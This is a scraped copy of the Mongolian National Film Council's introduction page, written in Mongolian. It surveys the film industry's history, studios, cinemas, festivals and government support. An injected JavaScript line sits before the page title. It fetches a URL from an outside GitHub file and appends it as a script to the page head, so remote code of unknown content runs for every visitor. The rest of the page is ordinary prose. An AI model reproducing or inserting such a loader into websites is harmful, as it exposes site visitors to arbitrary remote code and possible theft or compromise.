;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Танилцуулга - Mongolian National Film Council

Монголын кино урлаг

Монгол улсын засгийн газар Соёлын яам, Кино урлагийг дэмжих санг байгуулж, Кино урлагийг дэмжих тухай хуулийг баталж хэрэгжүүлж эхэлсэнтэй холбоотойгоор Монголын кино урлагийн орчин цагийн шинэ түүхэн үе эхэлж байна.

Кино урлагТанилцуулга

Кино урлаг мэргэшихийн сацуу мэргэжлийн институцийн түвшинд хүрч хөгжсөн бусад оронтой харьцуулбал харьцангуй богино хугацаанд эрчимтэй хөгжиж, үндэсний хэв шинжийг олж, өргөжин тэлсэн урлагийн төрлийн нэг бол монголын кино урлаг юм. Монголын кино салбарыг сүүлийн 5 жилийн статистик, тоо баримтад үндэслэн тоймловол тогтвортой үйл ажиллагаа явуулж буй 80 кино студи (http://103.85.185.145/film-library/байгууллага), продакшн, 667 кино салбарын ажилтан, монголын 1,877,077 үзэгчдэд 15 кино театр, 41 үзвэрийн цэг, 9,368 үзэгчийн суудал болон бусад түгээлтийн сувгаар дамжуулан жилд дунджаар 40 (арилжааны, артхаус болон баримтат) шинэ кино бүтээл (цар тахлын жилүүдэд энэ тоо 17 болж буурсан) хүргэж байна.

Өнөөдөр Монголын кино урлагт; 1990 оны шилжилтийн үеэс хойш байгалийн жамаар хөгжлийнхөө замыг туулан хөвөрсөөр дотоодын олон улсын кино наадам (Улаанбаатар Олон Улсын Кино Наадам, Алтан Өргөө Олон Улсын Кино Наадам, 48 цаг кино наадам), шагнал гардуулах ёслол бүхий, засгийн газрын бодлого, кино урлагийг дэмжих хуулиар ивээгдсэн, соёлын бүтээлч үйлдвэрлэлийн цогц нэгэн хэсэг болон ондооших шинэ цаг үе эхэлж байна.

Кино урлаг бол гоо зүй, үзэл суртал, техник технологийн дэвшил бас бизнес юм. Тиймээс монгол улсын засгийн газар Монголын Кино Урлагийн Зөвлөлийг байгуулж, улмаар хэрэгжүүлэх бодлогын хүрээнд кино уран бүтээлчдийг олон улсын туршлагаас суралцах, дэлхийн шилдэг урлагийн сургуулиудад мэргэшүүлэх боломжийг олгож, монголын болон дэлхийн шилдэг уран бүтээлчдийн хамтарсан бүтээл төрүүлэх, монгол орны өв соёл, ёс заншил, эх түүх, үзэсгэлэнт байгаль, дотоод нөөц боломжийг дэлхийн тавцанд сурталчлах, эдийн засгийн эргэлтэд оруулах, монгол хүний ялгамж чанарыг бататган сурталчлахыг алсын хараа, эрхэм зорилго болгон Монголын кино урлагийг цогцоор нь дэмжиж хөгжүүлэхээр ажиллаж байна.